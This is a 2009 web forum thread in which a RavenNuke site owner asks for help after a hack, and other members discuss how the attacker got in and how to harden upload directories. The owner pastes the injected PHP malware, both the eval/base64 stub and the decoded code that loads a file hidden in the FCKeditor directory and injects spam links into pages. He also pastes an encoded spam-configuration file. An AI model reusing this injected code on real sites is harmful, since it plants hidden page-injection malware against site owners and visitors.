Site hacked, fckeditor perhaps?

999 · Regular Joined: Sep 12, 2006 Posts: 58 Location: Dsm, IA

My site was just hacked with a large number of files containing

Code:

<?php /**/eval(base64_decode('aWYoZnV ... ')); ?>

at the top. I'll post the whole thing if needed, but decoded it come out to

Code:

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/xxx/public_html/includes/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php')){include_once('/home/xxx/public_html/includes/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

Wondering if this is an exploit in the fckeditor or something else? I'm running RN2.30.02, and I make sure I patch everything on the site as it comes. I already contacted my host, just trying to figure out how they got in. Confused

evaders99 · Posted: Thu Sep 03, 2009 7:59 pm

Definitely start with your host and see whether you can get access logs to determine how they got in. It does look like FCKEditor could be an issue if its reading from that directory

Let us know if you need any help

kguske · Site Admin Joined: Jun 04, 2004 Posts: 5997

includes/fckeditor/editor/filemanager/browser/default/images/icons/32 shouldn't be writeable. If that php file is there, it's possible (if not likely) that there are security issues on the server (I've seen something like this happen before with an FTP security issue, and it affected every account on the server).

In the mean time, if you have access to your account logs, check that, but if it's a server issue, you won't find anything there...

999 · Regular Joined: Sep 12, 2006 Posts: 58 Location: Dsm, IA

Unfortunately the logs had rolled over so they couldn't look at the actual attack, I have the raw log from yesterday but haven't seen anything in it yet (lot in there). That directory isn't world writeable, after running a cmd via ssh I only found a few directories that are (used by clan roster, gallery2, vsp stats, open realty, all up to date). I'm going to go through and make sure those actually need to be writeable but fckeditor wasn't one of them.

I had upgraded to fckeditor 2.6.4.1 which was the newest some time ago, but did find several files in there that shouldn't have been there. One had

Code:

78.36.167.197|1251994982
88.175.65.171|1251997114
95.17.34.164|1251999646
209.163.190.130|1252000351
78.155.51.255|1252003660
151.48.124.58|1252008367
66.92.130.158|1252009485
201.9.137.165|1252011765
89.24.130.142|1252016901
24.77.216.254|1252024403
122.102.128.77|1252025348
66.56.153.54|1252028808
72.201.85.107|1252036534

another

Code:

ZGdxbg== = "d3VvbQ=="
dHQ= = "Wz5VRl9LRVlXT1JEPF0="
ZGd1cmw= = "aHR0cDovL3BlYXJjaC5uZXQvaW4uY2dpPzE1JnBhcmFtZXRlcj0ka2V5d29yZCZzZT0kc2Umc2VvcmVmPSVyZWYlJkhUVFBfUkVGRVJFUj0lc2VsZl91cmwlJmRlZmF1bHRfa2V5d29yZD0la3cl"
ZGdzdQ== = "aHR0cDovL3BlYXJjaC5uZXQvaW4uY2dpPzcmcGFyYW1ldGVyPSVrdyUmSFRUUF9SRUZFUkVSPSVzZWxmX3VybCU="
ZGd1aA== = "aHR0cDovL25vbXNhdDI0Lm5ldC87aHR0cDovL25zc2F0NC5jb20vO2h0dHA6Ly93cGxzYXQyNC5uZXQv"
ZGdpZA== = "YzcwM2Y2OTItMTcxZS0xNzI5LWQyMDUtYmMwZGQ2MjZlY2Qy"
a2Q= = Mg==
cHJs = MA==
c3A= = MzA=
c3Q= = "c3Ryb25nO2VtO2I7aTt1"
Y3Q= = MTAwMDAwMDAwMA==
bWFya292 = MA==
ZGdibG8= = MQ==
ZnJi = MQ==
bWw= = NTA=
ZGdzcg== = MQ==
ZGdzdA== = MjQ=
ZGdmZA== = MA==
cXI= = "c2lkO3BocHNlc3NpZDtjYWtlcGhwO29zY3NpZDtwaHBraXRzaWQ7eGNpZDtzZXNzaW9uaWQ="
ZnI= = MA==
a3dy = MQ==
dGhlbWU= = ""

there was another that had tons of "spam related" words (blackjack, viagra, xanax, etc) and another was an swf binary. So at this point I'm guessing they were trying to add links to all the pages for spamming purposes, although I'm still not totally sure how they got in.

I've reverted fkceditor back to the version that came with 2.30.02, although it's a few versions behind so I don't know if that's a good idea. I did find that the owner had installed an old version of dolphin which has now been removed, but if they used that I don't understand why they would use the fckeditor directory as dolphin was on it's own in a subdirectory/for a subdomain.

Sorry for the long post. Do you think I should upgrade again to the newest fckeditor (2.6.4.1) or is the version with rn (2.63) the safer choice at this point?

evaders99 · Posted: Fri Sep 04, 2009 6:41 pm

The upgrade for the latest FCKEditor probably hasn't been tested under RavenNuke. Yes, that could be the way they got in.

kguske is definitely the one to talk to, since he's integrating nukeWYSIWYG (FCKEditor) for RavenNuke

kguske · Site Admin Joined: Jun 04, 2004 Posts: 5997

If you had FCKeditor 2.6.4.1, that works and is tested with RavenNuke (assuming it is configured correctly). It also contains some additional security features to prevent authorized uploads (if you used the version from nukeSEO or RN 2.3.2). But as I said earlier, this appears to have been done through another means. Even with 2.30, this shouldn't have been possible since even that version had features built in to prevent uploading executable files.

999 · Regular Joined: Sep 12, 2006 Posts: 58 Location: Dsm, IA

Yes I had the version from NukeSEO, and I've now upgraded back to it after removing all files. It's weird because I'm kinda wanting them to do it again, replacing the files isn't really an issue, I can just rsync back from known good files, I just really want to know how specifically they got in. Perhaps it was the dolphin install but that still bugs me why they'd use the fckeditor directory for all their files. Confused

Guardian2003 · Posted: Sat Sep 05, 2009 3:57 pm

They probably used that directory to keep you focused on finding a problem with FCKeditor that doesn't exist.

sixonetonoffun · Posted: Sat Feb 13, 2010 12:01 pm

This is an old topic but worth a bump. An added measure of security is to limit the access (Assuming your on an apache web server) with .htaccess.

www/uploads/.htaccess

Code:

# Add Extensions as needed as shown
deny from all
<Files ~ "^\w+\.(gif|jpe?g|png|avi)$">
order deny,allow
allow from all
</Files>

This will help to prevent double extension exploits such as php.jpg and will limit access to files with extensions in the array. IE images you want people to see! Maybe someone can improve on this but this is pretty universally excepted to work as it is.

spasticdonkey · Posted: Sat Feb 13, 2010 12:17 pm

that's a pretty cool little snippet, thanks!